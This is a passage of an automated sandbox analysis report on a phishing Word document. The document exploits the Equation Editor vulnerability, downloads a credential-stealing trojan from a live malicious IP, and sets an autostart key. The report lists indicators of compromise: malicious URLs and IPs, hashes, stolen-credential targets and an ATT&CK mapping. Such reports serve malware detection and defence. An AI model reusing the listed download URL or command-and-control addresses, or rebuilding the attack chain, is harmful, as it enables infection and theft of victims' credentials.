            Source: C:\Users\user\AppData\Roaming\fiftikmernk852317.exeCode function: 5_2_009AF56D AllocateAndInitializeSid,LookupAccountSidW,GetLastError,FreeSid,
            Source: C:\Users\user\AppData\Roaming\fiftikmernk852317.exeCode function: 5_2_009B18BA InitializeSecurityDescriptor,SetSecurityDescriptorDacl,RegCreateKeyExA,RegCloseKey,SetLastError,
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell_ise.exe VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\hh.exe VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\assembly\GAC_32\System.Transactions\2.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\assembly\GAC_32\System.Transactions\2.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\assembly\GAC_32\System.Data\2.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\assembly\GAC_32\System.Data\2.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
            Source: C:\Users\user\AppData\Roaming\fiftikmernk852317.exeCode function: 5_2_00DD8F8B cpuid
            Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid
            Source: C:\Users\user\AppData\Roaming\fiftikmernk852317.exeCode function: 5_2_00DD9284 GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter,

            Lowering of HIPS / PFW / Operating System Security Settings

            barindex
            Increases the number of concurrent connection per server for Internet Explorer
            Source: C:\Users\user\AppData\Roaming\fiftikmernk852317.exeRegistry key created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings MaxConnectionsPerServer 10Jump to behavior

            Stealing of Sensitive Information

            barindex
            Yara detected AveMaria stealer
            Source: Yara matchFile source: 5.2.fiftikmernk852317.exe.242053f.4.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 5.2.fiftikmernk852317.exe.9a0000.0.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 5.2.fiftikmernk852317.exe.242053f.4.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 00000005.00000003.980052176.00000000004DB000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000005.00000003.979964184.00000000004D5000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000005.00000003.980132553.00000000004DF000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000005.00000003.979955423.00000000004CE000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000005.00000002.1180934477.0000000002420000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000005.00000002.1180424961.00000000009B4000.00000002.00001000.00020000.00000000.sdmp, type: MEMORY
            Contains functionality to steal e-mail passwords
            Source: C:\Users\user\AppData\Roaming\fiftikmernk852317.exeCode function: POP3 Password
            Source: C:\Users\user\AppData\Roaming\fiftikmernk852317.exeCode function: SMTP Password
            Source: C:\Users\user\AppData\Roaming\fiftikmernk852317.exeCode function: IMAP Password
            Contains functionality to steal Chrome passwords or cookies
            Source: C:\Users\user\AppData\Roaming\fiftikmernk852317.exeCode function: \Google\Chrome\User Data\Default\Login Data
            Source: C:\Users\user\AppData\Roaming\fiftikmernk852317.exeCode function: \Chromium\User Data\Default\Login Data
            Source: Yara matchFile source: 5.2.fiftikmernk852317.exe.242053f.4.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 5.2.fiftikmernk852317.exe.9a0000.0.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 5.2.fiftikmernk852317.exe.242053f.4.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 00000005.00000003.980052176.00000000004DB000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000005.00000003.979964184.00000000004D5000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000005.00000003.980132553.00000000004DF000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000005.00000002.1180934477.0000000002420000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000005.00000002.1180424961.00000000009B4000.00000002.00001000.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: fiftikmernk852317.exe PID: 912, type: MEMORYSTR

            Remote Access Functionality

            barindex
            Yara detected AveMaria stealer
            Source: Yara matchFile source: 5.2.fiftikmernk852317.exe.242053f.4.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 5.2.fiftikmernk852317.exe.9a0000.0.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 5.2.fiftikmernk852317.exe.242053f.4.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 00000005.00000003.980052176.00000000004DB000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000005.00000003.979964184.00000000004D5000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000005.00000003.980132553.00000000004DF000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000005.00000003.979955423.00000000004CE000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000005.00000002.1180934477.0000000002420000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000005.00000002.1180424961.00000000009B4000.00000002.00001000.00020000.00000000.sdmp, type: MEMORY

            Mitre Att&ck Matrix

            Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
            Valid Accounts2
            Native API            		1
            Create Account            		1
            Access Token Manipulation            		2
            Disable or Modify Tools            		2
            OS Credential Dumping            		1
            System Time Discovery            		Remote Services1
            Archive Collected Data            		Exfiltration Over Other Network Medium33
            Ingress Tool Transfer            		Eavesdrop on Insecure Network CommunicationRemotely Track Device Without Authorization1
            Endpoint Denial of Service
            Default Accounts22
            Exploitation for Client Execution            		1
            Windows Service            		1
            Windows Service            		1
            Deobfuscate/Decode Files or Information            		21
            Input Capture            		1
            System Service Discovery            		Remote Desktop Protocol21
            Input Capture            		Exfiltration Over Bluetooth2
            Encrypted Channel            		Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
            Domain Accounts1
            Command and Scripting Interpreter            		Logon Script (Windows)421
            Process Injection            		2
            Obfuscated Files or Information            		1
            Credentials In Files            		4
            File and Directory Discovery            		SMB/Windows Admin SharesData from Network Shared DriveAutomated Exfiltration1
            Non-Standard Port            		Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
            Local Accounts2
            Service Execution            		Logon Script (Mac)Logon Script (Mac)1
            Software Packing            		NTDS25
            System Information Discovery            		Distributed Component Object ModelInput CaptureScheduled Transfer1
            Non-Application Layer Protocol            		SIM Card SwapCarrier Billing Fraud
            Cloud AccountsCronNetwork Logon ScriptNetwork Logon Script3
            Masquerading            		LSA Secrets131
            Security Software Discovery            		SSHKeyloggingData Transfer Size Limits121
            Application Layer Protocol            		Manipulate Device CommunicationManipulate App Store Rankings or Ratings
            Replication Through Removable MediaLaunchdRc.commonRc.common31
            Virtualization/Sandbox Evasion            		Cached Domain Credentials31
            Virtualization/Sandbox Evasion            		VNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features
            External Remote ServicesScheduled TaskStartup ItemsStartup Items1
            Access Token Manipulation            		DCSync2
            Process Discovery            		Windows Remote ManagementWeb Portal CaptureExfiltration Over Alternative ProtocolCommonly Used PortRogue Wi-Fi Access PointsData Encrypted for Impact
            Drive-by CompromiseCommand and Scripting InterpreterScheduled Task/JobScheduled Task/Job421
            Process Injection            		Proc Filesystem1
            Application Window Discovery            		Shared WebrootCredential API HookingExfiltration Over Symmetric Encrypted Non-C2 ProtocolApplication Layer ProtocolDowngrade to Insecure ProtocolsGenerate Fraudulent Advertising Revenue
            Exploit Public-Facing ApplicationPowerShellAt (Linux)At (Linux)1
            Hidden Files and Directories            		/etc/passwd and /etc/shadow1
            Remote System Discovery            		Software Deployment ToolsData StagedExfiltration Over Asymmetric Encrypted Non-C2 ProtocolWeb ProtocolsRogue Cellular Base StationData Destruction
            Supply Chain CompromiseAppleScriptAt (Windows)At (Windows)1
            Hidden Users            		Network SniffingProcess DiscoveryTaint Shared ContentLocal Data StagingExfiltration Over Unencrypted/Obfuscated Non-C2 ProtocolFile Transfer ProtocolsData Encrypted for Impact

            Behavior Graph

            Hide Legend

            Legend:

            • Process
            • Signature
            • Created File
            • DNS/IP Info
            • Is Dropped
            • Is Windows Process
            • Number of created Registry Values
            • Number of created Files
            • Visual Basic
            • Delphi
            • Java
            • .Net C# or VB.NET
            • C, C++ or other language
            • Is malicious
            • Internet

            Screenshots

            Thumbnails

            This section contains all screenshots as thumbnails, including those not shown in the slideshow.


            windows-stand

            Antivirus, Machine Learning and Genetic Malware Detection

            Initial Sample

            SourceDetectionScannerLabelLink
            New Order ( MY 01-22-DTHI .doc42%VirustotalBrowse
            New Order ( MY 01-22-DTHI .doc43%MetadefenderBrowse
            New Order ( MY 01-22-DTHI .doc48%ReversingLabsDocument-RTF.Exploit.CVE-2017-11882
            New Order ( MY 01-22-DTHI .doc100%AviraHEUR/Rtf.Malformed

            Dropped Files

            SourceDetectionScannerLabelLink
            C:\Users\user\AppData\Roaming\fiftikmernk852317.exe100%AviraTR/AD.MortyStealer.obmwc
            C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\fifthikmerozx[1].exe100%AviraTR/AD.MortyStealer.obmwc
            C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRF{F633E147-4322-4DEF-8D52-47EC935B75D3}.tmp100%AviraEXP/CVE-2018-0798.Gen
            C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\fifthikmerozx[1].exe58%ReversingLabsWin32.Trojan.MortyStealer
            C:\Users\user\AppData\Roaming\fiftikmernk852317.exe58%ReversingLabsWin32.Trojan.MortyStealer

            Unpacked PE Files

            SourceDetectionScannerLabelLinkDownload
            5.2.fiftikmernk852317.exe.242053f.4.unpack100%AviraTR/Patched.Ren.Gen3Download File
            5.2.fiftikmernk852317.exe.9a0000.0.unpack100%AviraTR/Redcap.ghjptDownload File
            8.2.cmd.exe.2930000.0.unpack100%AviraTR/Patched.GenDownload File

            Domains

            No Antivirus matches

            URLs

            SourceDetectionScannerLabelLink
            http://208.67.105.179/fifthikmerozx.exej100%Avira URL Cloudmalware
            76.8.53.13310%VirustotalBrowse
            76.8.53.133100%Avira URL Cloudmalware
            http://208.67.105.179/fifthikmerozx.exerrC:100%Avira URL Cloudmalware
            http://208.67.105.179/fifthikmerozx.exe.100%Avira URL Cloudmalware
            http://208.67.105.179/fifthikmerozx.exe100%Avira URL Cloudmalware
            http://www.piriform.co0%Avira URL Cloudsafe
            http://208.67.105.179/fifthikmerozx.exelateC:100%Avira URL Cloudmalware

            Domains and IPs

            Contacted Domains

            No contacted domains info

            Contacted URLs

            NameMaliciousAntivirus DetectionReputation
            76.8.53.133true
            • 10%, Virustotal, Browse
            • Avira URL Cloud: malware
            		unknown
            http://208.67.105.179/fifthikmerozx.exetrue
            • Avira URL Cloud: malware
            		unknown

            URLs from Memory and Binaries

            NameSourceMaliciousAntivirus DetectionReputation
            http://www.piriform.com/ccleanerpowershell.exe, 00000006.00000003.984768254.00000000004BB000.00000004.00000020.00020000.00000000.sdmpfalse
              		high
              http://208.67.105.179/fifthikmerozx.exejEQNEDT32.EXE, 00000002.00000002.910363521.000000000067F000.00000004.00000020.00020000.00000000.sdmptrue
              • Avira URL Cloud: malware
              		unknown
              http://www.piriform.com/ccleanerhttp://www.piriform.com/ccleanervpowershell.exe, 00000006.00000003.984768254.00000000004BB000.00000004.00000020.00020000.00000000.sdmpfalse
                		high
                https://github.com/syohex/java-simple-mine-sweeperC:fiftikmernk852317.exe, 00000005.00000003.980052176.00000000004DB000.00000004.00000020.00020000.00000000.sdmp, fiftikmernk852317.exe, 00000005.00000003.979964184.00000000004D5000.00000004.00000020.00020000.00000000.sdmp, fiftikmernk852317.exe, 00000005.00000002.1180934477.0000000002420000.00000040.00001000.00020000.00000000.sdmp, fiftikmernk852317.exe, 00000005.00000003.980132553.00000000004DF000.00000004.00000020.00020000.00000000.sdmp, fiftikmernk852317.exe, 00000005.00000003.979955423.00000000004CE000.00000004.00000020.00020000.00000000.sdmp, fiftikmernk852317.exe, 00000005.00000002.1180424961.00000000009B4000.00000002.00001000.00020000.00000000.sdmpfalse
                  		high
                  http://208.67.105.179/fifthikmerozx.exerrC:EQNEDT32.EXE, 00000002.00000002.910363521.000000000067F000.00000004.00000020.00020000.00000000.sdmptrue
                  • Avira URL Cloud: malware
                  		unknown
                  http://208.67.105.179/fifthikmerozx.exe.EQNEDT32.EXE, 00000002.00000002.910363521.000000000067F000.00000004.00000020.00020000.00000000.sdmptrue
                  • Avira URL Cloud: malware
                  		unknown
                  https://github.com/syohex/java-simple-mine-sweeperfiftikmernk852317.exefalse
                    		high
                    http://www.piriform.copowershell.exe, 00000006.00000002.988213966.0000000000502000.00000004.00000020.00020000.00000000.sdmpfalse
                    • Avira URL Cloud: safe
                    		unknown
                    http://208.67.105.179/fifthikmerozx.exelateC:EQNEDT32.EXE, 00000002.00000002.910363521.000000000067F000.00000004.00000020.00020000.00000000.sdmptrue
                    • Avira URL Cloud: malware
                    		unknown

                    World Map of Contacted IPs

                    • No. of IPs < 25%
                    • 25% < No. of IPs < 50%
                    • 50% < No. of IPs < 75%
                    • 75% < No. of IPs

                    Public IPs

                    IPDomainCountryFlagASNASN NameMalicious
                    76.8.53.133
                    		unknownUnited States
                    		17185QUONIXNETUStrue
                    208.67.105.179
                    		unknownUnited States
                    		20042GRAYSON-COLLIN-COMMUNICATIONSUStrue

                    General Information

                    Joe Sandbox Version:35.0.0 Citrine
                    Analysis ID:679658
                    Start date and time: 06/08/202208:56:522022-08-06 08:56:52 +02:00
                    Joe Sandbox Product:CloudBasic
                    Overall analysis duration:0h 6m 20s
                    Hypervisor based Inspection enabled:false
                    Report type:light
                    Sample file name:New Order ( MY 01-22-DTHI .doc
                    Cookbook file name:defaultwindowsofficecookbook.jbs
                    Analysis system description:Windows 7 x64 SP1 with Office 2010 SP1 (IE 11, FF52, Chrome 57, Adobe Reader DC 15, Flash 25.0.0.127, Java 8 Update 121, .NET 4.6.2)
                    Number of analysed new started processes analysed:13
                    Number of new started drivers analysed:0
                    Number of existing processes analysed:0
                    Number of existing drivers analysed:0
                    Number of injected processes analysed:0
                    Technologies:
                    • HCA enabled
                    • EGA enabled
                    • HDC enabled
                    • AMSI enabled
                    Analysis Mode:default
                    Analysis stop reason:Timeout
                    Detection:MAL
                    Classification:mal100.phis.troj.spyw.expl.evad.winDOC@9/11@0/2
                    EGA Information:
                    • Successful, ratio: 75%
                    HDC Information:
                    • Successful, ratio: 37.4% (good quality ratio 35.7%)
                    • Quality average: 81.1%
                    • Quality standard deviation: 27.4%
                    HCA Information:
                    • Successful, ratio: 98%
                    • Number of executed functions: 0
                    • Number of non-executed functions: 0
                    Cookbook Comments:
                    • Found application associated with file extension: .doc
                    • Adjust boot time
                    • Enable AMSI
                    • Found Word or Excel or PowerPoint or XPS Viewer
                    • Attach to Office via COM
                    • Scroll down
                    • Close Viewer

                    Warnings

                    • Exclude process from analysis (whitelisted): dllhost.exe, WerFault.exe, conhost.exe, svchost.exe
                    • TCP Packets have been reduced to 100
                    • Excluded IPs from analysis (whitelisted): 104.208.16.94, 20.189.173.21, 104.208.16.93, 20.42.65.92
                    • Excluded domains from analysis (whitelisted): onedsblobprdcus07.centralus.cloudapp.azure.com, onedsblobprdeus17.eastus.cloudapp.azure.com, watson.microsoft.com, onedsblobprdwus16.westus.cloudapp.azure.com, legacywatson.trafficmanager.net, onedsblobprdcus16.centralus.cloudapp.azure.com
                    • Execution Graph export aborted for target EQNEDT32.EXE, PID 1036 because there are no executed function
                    • Not all processes where analyzed, report is missing behavior information
                    • Report size exceeded maximum capacity and may have missing behavior information.
                    • Report size getting too big, too many NtOpenKeyEx calls found.
                    • Report size getting too big, too many NtQueryAttributesFile calls found.
                    • Report size getting too big, too many NtQueryValueKey calls found.

                    Simulations

                    Behavior and APIs

                    TimeTypeDescription
                    08:58:15API Interceptor108x Sleep call for process: EQNEDT32.EXE modified
                    08:58:56API Interceptor12x Sleep call for process: powershell.exe modified
                    08:58:58API Interceptor628x Sleep call for process: cmd.exe modified
                    08:58:59AutostartRun: HKLM\Software\Microsoft\Windows\CurrentVersion\Run windowsfile C:\Users\user\AppData\Roaming\fiftikmernk852317.exe

                    Joe Sandbox View / Context

                    IPs

                    No context

                    Domains

                    No context

                    ASNs

                    No context

                    JA3 Fingerprints

                    No context

                    Dropped Files

                    No context

                    Created / dropped Files

                    C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\fifthikmerozx[1].exe

                    Download File
                    Process:C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
                    File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                    Category:downloaded
                    Size (bytes):2358784
                    Entropy (8bit):2.646635659437136
                    Encrypted:false
                    SSDEEP:6144:5633nN00RiTwSltgxCKYPMXq9NmiQBYGhpX8x4MWy1FYCz8hJ2n3C+8Jk7UBj7A0:5633+D4pa7+o
                    MD5:5AE8471C10CDB2A59B950E66F8CA8A46
                    SHA1:284F5B01A3D7F404DCD9B5346D1A67A9DE0E9C6B
                    SHA-256:2A83A969BE112352798176D1769378C9D3330799051DF12114B1BB8D7EF0BFB5
                    SHA-512:C872B2B93BC0CE74B89DC1F8A54FA4E5356A668FD3C406EE62EB63FEEEF93E03AD59D5B23B841287A2BB0ADEF54699049F3CC7C9CDD7EA2A91253DACBA4E0344
                    Malicious:true
                    Antivirus:
                    • Antivirus: Avira, Detection: 100%
                    • Antivirus: ReversingLabs, Detection: 58%
                    Reputation:low
                    IE Cache URL:http://208.67.105.179/fifthikmerozx.exe
                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........[V.n5..n5..n5.^04..n5.^06..n5.^01..n5.^00..n5......n5......n5..n4.}n5.F00..n5.F05..n5.F0...n5..n...n5.F07..n5.Rich.n5.................PE..L...*..b.....................n#.....:.............@..........................P$...........@.....................................,.....!.....................@$..... ...............................@...@...............T............................text............................... ..`.rdata...4.......6..................@..@.data..... ....... .................@....gfids..`.....!......b!.............@..@.tls..........!......d!.............@....rsrc........!......f!.............@..@.reloc.......@$.......#.............@..B................................................................................................................................................................................................................

                    C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRF{F633E147-4322-4DEF-8D52-47EC935B75D3}.tmp

                    Download File
                    Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                    File Type:Composite Document File V2 Document, Cannot read section info
                    Category:dropped
                    Size (bytes):5632
                    Entropy (8bit):3.9463825602375584
                    Encrypted:false
                    SSDEEP:48:rKQ0MP7r2uYe5DxwTjnBCj+zcXKf0F4Goz:OrMP7rDYe51wTjBI/XF1+
                    MD5:7F8C7ADE3B301FEF960FE2ED1E65EBB1
                    SHA1:899D99088483240DDD1429CCB62394E58FCB9E6A
                    SHA-256:BC5CB0703E8ACB0C8A3F21388CDE72F4379F67EC342C610A19A4E369FB19142F
                    SHA-512:8184EF481E5B5577E1B074CF2EE4044C5D0DA68E8A93D21DB873FA20E4BC03053A57AA0495A92FF9A67306AA8107EDC4B52F37C71F022A18BF1D26AC87713CAF
                    Malicious:true
                    Antivirus:
                    • Antivirus: Avira, Detection: 100%
                    Reputation:low
                    Preview:......................>...............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                    C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{2B64019E-B848-4D54-A6DE-401B40718F4D}.tmp

                    Download File
                    Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                    File Type:data
                    Category:dropped
                    Size (bytes):1024
                    Entropy (8bit):0.05390218305374581
                    Encrypted:false
                    SSDEEP:3:ol3lYdn:4Wn
                    MD5:5D4D94EE7E06BBB0AF9584119797B23A
                    SHA1:DBB111419C704F116EFA8E72471DD83E86E49677
                    SHA-256:4826C0D860AF884D3343CA6460B0006A7A2CE7DBCCC4D743208585D997CC5FD1
                    SHA-512:95F83AE84CAFCCED5EAF504546725C34D5F9710E5CA2D11761486970F2FBECCB25F9CF50BBFC272BD75E1A66A18B7783F09E1C1454AFDA519624BC2BB2F28BA4
                    Malicious:false
                    Reputation:high, very likely benign file
                    Preview:........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                    C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{75D9CFFF-DE90-421C-9B13-B8173C72695C}.tmp

                    Download File
                    Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                    File Type:data
                    Category:dropped
                    Size (bytes):10272
                    Entropy (8bit):3.6137878983995697
                    Encrypted:false
                    SSDEEP:192:HELnaSTP2CC4YuwRmftbOxHisgHGOOiJtsFOX5OnFOMZyorE9FkjWqkFTGTLsBE4:HO2CC40RmhOxHiwOLEg5+kMprE9F27Et
                    MD5:603335A84876AA12660E550436F49463
                    SHA1:04BAD035D4A4AEE6921DE346A09634F3972905E3
                    SHA-256:624E7F983806EC35127CC2B22971EA4427EDCA079B983BB158165AB47B0CFE25
                    SHA-512:BC518CA365EF7A1DC29AB42FF1FF9D20206188AB916CB456DB536F179B742524F72D45BA0135D12D23E00A86524596AC9E9AA4489CA2068DCAF189E6CC863897
                    Malicious:false
                    Reputation:low
                    Preview:?.c.l.i.c.k. .e.n.a.b.l.e. .e.d.i.t.i.n.g. .t.o. .o.p.e.n. .i.n. .r.e.a.d.a.b.l.e. .f.o.r.m.a.t.'.?.?.7.!.?.;.|.`.$.].?.?.'...9.#.3.4.4.~.#.[.|...|.'.?.~.,.<.3.+.+.:...&.'.^.?.9.?.1...?.,.0.*.!.~.<.+.[.7.2.<.!.(.9.8.,.?.1...'.4.7.;.;.%.'.$.$.;.+.9.`.?.;.%.~.|.<.:...@.@.<...-.5.+.^...<.4...`.?.|.?.|.8.,.?.?.9.~.#.+.2.+.$...+.).7.?...`.5.>.?.1.?.(.?.6.:.^.2.?.'.%._.7.-.../._.@.0.`.3.?.2.;.3.3.-.8./.^.~.2...7.,.?.4.%.].[._.2.-.+._...0.?.!.^.0.4.,.%.%.?.&.9.9.?.].^.-.*...<.?...*.?.?.%.].;.!._.?.=.0.9.'.%./.7.?.#.,.].>.4.>.=.?.7.4.?.0.?.+.9.~...?.?./...5.&.|.6.&.=.%.-.%.?.5.5.'.)...%.9.>./.?.?.+.0.'.+...<.>.?.|.+.-...].#...%.|.?.~.3...`.<.:.~.?.9.?.3.[.+.].5...:...<.5.8.4.....>.@.'.6.!.8.;...4.=.!.?.|.7.5.0.;.?.=.'...&.7.3.;.-.>...3.[.?.;.`.6.&.$.%.[.#...0...?.,.%...0.|.`.;.'.?.[.!.&.0.5...6.*.=.*.%.?.^...6.6.<.=.1.?.0.%.7.2./.%.|.3.0.;.*.`.*.7.0.3...<.9.?.2.-.9.-.#.9.;.&.2.'.?.`.`.5.~.<.:.;.(.'.)...:...%.,.$.%.~.%.<.4.9.4./.4.?...*.@.?.:.:.4.1.$.?.].?.3.`.).`.0.2.8.#.(.$.:.1.0.0.(.8.?.6.-.

                    C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\New Order ( MY 01-22-DTHI .LNK

                    Download File
                    Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                    File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Archive, ctime=Tue Mar 8 15:45:54 2022, mtime=Tue Mar 8 15:45:54 2022, atime=Sat Aug 6 14:58:12 2022, length=11198, window=hide
                    Category:dropped
                    Size (bytes):1094
                    Entropy (8bit):4.564165251946446
                    Encrypted:false
                    SSDEEP:24:8Vt/XTRKJIctLJooehaOZJo3Dv3qNAu7D:8n/XT0BLJ/GTJPNA0D
                    MD5:C0714287529BC5BE397AE18F355E0016
                    SHA1:3BD54E065A9854A631FC5641B43883167E01D75C
                    SHA-256:53C440D247757EBB45B935DC38C5A826DD98DF7C1509A8CA0B8CDD57B8133B81
                    SHA-512:BD268D885C241595ADE0D220080F1194CAD44E2668B535E1324E23357B60A3761206001A7AE052E78A9827B1A8C1D39DA181C67A87B2217C99336793B48F4B8E
                    Malicious:false
                    Preview:L..................F.... ...6.K..3..6.K..3.....T.....+...........................P.O. .:i.....+00.../C:\...................t.1.....QK.X..Users.`.......:..QK.X*...................6.....U.s.e.r.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.8.1.3.....L.1.....hT....user.8......QK.XhT..*...&=....U...............A.l.b.u.s.....z.1.....hT....Desktop.d......QK.XhT..*..._=..............:.....D.e.s.k.t.o.p...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.6.9.......2..+...UG. .NEWORD~1.DOC..j......hT..hT..*...r.....'...............N.e.w. .O.r.d.e.r. .(. .M.Y. .0.1.-.2.2.-.D.T.H.I. ...d.o.c.......................-...8...[............?J......C:\Users\..#...................\\813848\Users.user\Desktop\New Order ( MY 01-22-DTHI .doc.5.....\.....\.....\.....\.....\.D.e.s.k.t.o.p.\.N.e.w. .O.r.d.e.r. .(. .M.Y. .0.1.-.2.2.-.D.T.H.I. ...d.o.c.........:..,.LB.)...Ag...............1SPS.XF.L8C....&.m.m............-...S.-.1.-.5.-.2.1.-.9.6.6.7.7.1.3.1.5.-.3.0.1.9.4.0.5.6.3.7.-.3.6.7.3.3.6.4.7.7.-.1.0.0.6.............`.....

                    C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\index.dat

                    Download File
                    Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                    File Type:ASCII text, with CRLF line terminators
                    Category:dropped
                    Size (bytes):103
                    Entropy (8bit):4.873943194306733
                    Encrypted:false
                    SSDEEP:3:bDuMJlz+U3HIqXCmX1iU3HIqXCv:bC4Z3HR3Hm
                    MD5:74392C81A89548599B3B11D71F11044C
                    SHA1:86DA8462C95F3C7E86EB9FDCE8B6AA2AA03AA402
                    SHA-256:BCFC22DEFB5EA8D0A14D6C9965B65B27900229F90CEECA106F46B9FB46B5D81A
                    SHA-512:D8786A4C90F44D856D91A7BF9358D1790B7F984C2FC2B87F980FCC042A83FD8ED92DB5E0407C150355428C322E6C864288FC30010709B7C5906E810BF3D256E8
                    Malicious:false
                    Preview:[folders]..Templates.LNK=0..New Order ( MY 01-22-DTHI .LNK=0..[doc]..New Order ( MY 01-22-DTHI .LNK=0..

                    C:\Users\user\AppData\Roaming\Microsoft\Templates\~$Normal.dotm

                    Download File
                    Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                    File Type:data
                    Category:dropped
                    Size (bytes):162
                    Entropy (8bit):2.503835550707525
                    Encrypted:false
                    SSDEEP:3:vrJlaCkWtVyHH/cgQfmW+eMdln:vdsCkWtUb+8ll
                    MD5:D9C8F93ADB8834E5883B5A8AAAC0D8D9
                    SHA1:23684CCAA587C442181A92E722E15A685B2407B1
                    SHA-256:116394FEAB201D23FD7A4D7F6B10669A4CBCE69AF3575D9C1E13E735D512FA11
                    SHA-512:7742E1AC50ACB3B794905CFAE973FDBF16560A7B580B5CD6F27FEFE1CB3EF4AEC2538963535493DCC25F8F114E8708050EDF5F7D3D146DF47DA4B958F0526515
                    Malicious:false
                    Preview:.user..................................................A.l.b.u.s.............p........15..............25.............@35..............35.....z.......p45.....x...

